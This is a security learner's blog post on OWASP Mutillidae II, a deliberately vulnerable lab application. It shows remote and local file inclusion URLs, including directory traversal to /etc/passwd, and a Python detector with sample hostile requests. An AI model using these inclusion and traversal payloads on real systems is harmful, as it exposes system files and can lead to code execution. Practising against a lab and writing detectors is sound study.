About this blog

I'm a developer with over 10 years' experience who wants to transition to infosec. This blog is an informal record of my experiments with OWASP's Mutillidae II, a web application exhibiting a multitude of deliberate vulnerabilities. I will also take Offensive Security's PWK training course and get the OSCP certificate.

Wednesday, 31 August 2016

RFI and LFI with directory traversal


The 'Styling with Mutillidae' page contains an iframe whose src is set by the page-to-frame query parameter:

http://localhost/mutillidae/index.php?page=styling-frame.php&page-to-frame=styling.php%3Fpage-title%3DStyling+with+Mutillidae

RFI works:  http://localhost/mutillidae/index.php?page=styling-frame.php&page-to-frame=http://foo.com


I tried to find a URL on the net with a .php extension that was served with a text/plain MIME type (so I could see my server run the remote code), but failed. I think that is how one would get a shell on a box using RFI though - include a remote .php with the shellcode in it.

LFI obviously works: http://localhost/mutillidae/index.php?page=styling-frame.php&page-to-frame=phpinfo.php  


Directory traversal LFI also works on the page param: http://localhost/mutillidae/index.php?page=/etc/passwd&page-to-frame=phpinfo.php
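To spot requests like the ones above in web server logs, here is a small detector for the `page` and `page-to-frame` parameters. It is an added example, not part of the original post or of Mutillidae; the rule that a normal value is a bare `.php` script name is an assumption, and the last sample URL is constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameters abused in the URLs from this post.
WATCHED = ("page", "page-to-frame")
# Assumption: a legitimate value is a bare local script name, optionally with a query string.
SAFE_VALUE = re.compile(r"^[A-Za-z0-9_-]+\.php(\?.*)?$")
SCHEME = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")
DRIVE = re.compile(r"^[A-Za-z]:[\\/]")


def classify(value):
    """Return a label for a suspicious parameter value, or None if it looks normal."""
    v = unquote(value).strip()  # second decode, so double-encoded input is seen as well
    if SCHEME.match(v) or v.startswith("//"):
        return "url-scheme"          # remote include / framing of an external site
    if v.startswith(("/", "\\")) or DRIVE.match(v):
        return "absolute-path"       # e.g. page=/etc/passwd
    if ".." in v.replace("\\", "/").split("/"):
        return "dot-dot-traversal"
    if "\x00" in v:
        return "null-byte"
    if not SAFE_VALUE.match(v):
        return "unexpected-value"
    return None


def scan_request(url):
    """Return (parameter, label, value) for every watched parameter that looks abused."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    findings = []
    for name in WATCHED:
        for value in query.get(name, []):
            label = classify(value)
            if label:
                findings.append((name, label, value))
    return findings


if __name__ == "__main__":
    base = "http://localhost/mutillidae/index.php?page="
    samples = [  # first four are the URLs from the post; the last is constructed
        base + "styling-frame.php&page-to-frame=styling.php%3Fpage-title%3DStyling+with+Mutillidae",
        base + "styling-frame.php&page-to-frame=http://foo.com",
        base + "styling-frame.php&page-to-frame=phpinfo.php",
        base + "/etc/passwd&page-to-frame=phpinfo.php",
        base + "..%252f..%252fetc%252fpasswd",
    ]
    for url in samples:
        print(scan_request(url) or "clean", "<-", url)
```

The `page-to-frame=phpinfo.php` request comes back clean because the value has the same shape as a legitimate one; catching it takes a server-side allowlist of the pages the application is actually meant to include or frame.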

